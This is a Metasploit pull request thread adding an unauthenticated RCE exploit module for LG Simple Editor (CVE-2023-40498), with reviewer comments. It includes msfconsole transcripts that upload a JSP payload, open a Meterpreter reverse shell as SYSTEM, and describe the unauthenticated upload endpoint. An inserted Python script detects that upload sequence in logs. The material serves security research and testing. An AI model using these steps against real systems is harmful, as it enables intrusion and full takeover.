
Add LG Simple Editor Unauthenticated RCE (CVE-2023-40498) Exploit #18329

Merged
merged 7 commits into from
Sep 7, 2023

Conversation

EgeBalci
Copy link
Contributor

Hello 👋

This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on LG Simple Editor versions <= v3.21. The module achieves code execution via uploading and executing a JSP payload.

Testing

To install the vulnerable version, follow the steps below:

  1. Download the installation file of the vulnerable software here
  2. Follow the installation steps.

After these steps, the LG Simple Editor service should be accessible on port 8080.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/http/lg_simple_editor_rce
  • Do set rhost [IP]
  • Do check

EgeBalci and others added 3 commits September 1, 2023 01:16
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Contributor

@jheysel-r7 jheysel-r7 left a comment

Thanks for the module @EgeBalci, looks great, testing was as expected.

Just a couple of last-minute comments about the metadata.

msf6 > use lg_simple
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/windows/http/lg_simple_editor_rce  2023-08-24       excellent  Yes    LG Simple Editor Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/lg_simple_editor_rce

[*] Using exploit/windows/http/lg_simple_editor_rce
msf6 exploit(windows/http/lg_simple_editor_rce) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(windows/http/lg_simple_editor_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/lg_simple_editor_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 3.21.0
[*] Uploading JSP payload...
[+] Payload uploaded successfully
[+] /XasNt_original.bmp -> /XasNt.jsp copy successfull.
[*] Triggering payload...
[*] Sending stage (175686 bytes) to 172.16.199.131
[+] Deleted ./webapps/simpleeditor/XasNt.jsp
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:51845) at 2023-09-05 18:05:07 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-8ATHH6O
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

'Description' => %q{
This Metasploit module exploits broken access control and directory traversal
vulnerabilities in LG Simple Editor software for gaining code execution.
The vulnerabilities exists in versions of LG Simple Editor prior to v3.21.
Contributor

I saw the ZDI advisory/ the references listed below only mention one CVE but here you're mentioning the module exploits multiple vulnerabilities. Should there be another CVE listed in the references? Just curious.

Suggested change:
- The vulnerabilities exists in versions of LG Simple Editor prior to v3.21.
+ The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.

Contributor Author

Yes, the module exploits two vulns, but directory traversal is the only one reported to ZDI. The second vuln is broken access control because the uploadImage.do endpoint does not require authentication. I discovered the second vulnerability while trying to exploit the first one. I couldn't find any CVE or related publication; it might be a 0day.
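A defender-side check for the sequence the thread describes (a request to the unauthenticated uploadImage.do endpoint followed shortly by a request for a JSP under /simpleeditor/, where the session output shows the dropped file landing), added here as an example and not part of the PR or the module; the log lines are constructed, and the combined-log format, the JSP path pattern and the 60-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Apache/Tomcat combined-log style (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Sep/2023:16:14:20 -0400] "POST /simpleeditor/uploadImage.do HTTP/1.1" 200 211
10.0.0.5 - - [07/Sep/2023:16:14:22 -0400] "GET /simpleeditor/thWIS.jsp HTTP/1.1" 200 0
10.0.0.9 - - [07/Sep/2023:16:15:01 -0400] "GET /simpleeditor/login.do HTTP/1.1" 200 4312
10.0.0.9 - - [07/Sep/2023:16:15:05 -0400] "POST /simpleeditor/uploadImage.do HTTP/1.1" 200 211
10.0.0.5 - - [07/Sep/2023:16:20:00 -0400] "GET /simpleeditor/other.jsp HTTP/1.1" 404 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
UPLOAD_PATH = "/simpleeditor/uploadImage.do"  # unauthenticated upload endpoint named in the PR
JSP_RE = re.compile(r"^/simpleeditor/[^/?]+\.jsp(?:\?.*)?$")  # assumed location of dropped JSPs


def parse_line(line):
    """Return (client_ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method.upper(), path, int(status)


def find_suspicious_clients(log_text, window_seconds=60):
    """Map client IP -> JSP paths requested within the window after that client's last upload."""
    last_upload = {}
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, _status = rec
        if method == "POST" and path == UPLOAD_PATH:
            last_upload[ip] = when  # uploads alone are normal use; only the follow-up is suspicious
        elif JSP_RE.match(path) and ip in last_upload:
            delta = (when - last_upload[ip]).total_seconds()
            if 0 <= delta <= window_seconds:
                hits[ip].append(path)
    return dict(hits)


if __name__ == "__main__":
    for ip, paths in find_suspicious_clients(SAMPLE_LOG).items():
        print(f"{ip}: upload followed by JSP request(s) {paths}")
```

The upload from 10.0.0.9 is not flagged on its own, and the later other.jsp request from 10.0.0.5 falls outside the default window; widen the window (or add a check for unexpected .jsp files under webapps/simpleeditor) to tune the signal.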

Contributor

Cool, after a quick search I couldn't find anything related to the second vuln either. There were 25 CVEs disclosed in the security bulletin, and ZDI specified that the path traversal is exploitable without authentication. I say we land this as is for now; however, when more info comes out, if this does turn out to be a 0day we can help get you a CVE assigned.

modules/exploits/windows/http/lg_simple_editor_rce.rb (outdated, resolved)
EgeBalci and others added 2 commits September 7, 2023 17:00
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
@jheysel-r7
Contributor

Thanks @EgeBalci, great module, testing was as expected:

msf6 exploit(windows/http/lg_simple_editor_rce) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(windows/http/lg_simple_editor_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/lg_simple_editor_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 3.21.0
[*] Uploading JSP payload...
[+] Payload uploaded successfully
[+] /thWIS_original.bmp -> /thWIS.jsp copy successfull.
[*] Triggering payload...
[*] Sending stage (175686 bytes) to 172.16.199.131
[+] Deleted ./webapps/simpleeditor/thWIS.jsp
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:62426) at 2023-09-07 16:14:40 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-8ATHH6O
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

@jheysel-r7 jheysel-r7 merged commit ef4a9dd into rapid7:master Sep 7, 2023
34 checks passed
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 7, 2023
@jheysel-r7
Contributor

Release Notes

This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on LG Simple Editor versions <= v3.21. The module achieves code execution in the context of NT AUTHORITY\SYSTEM via uploading and executing a JSP payload.
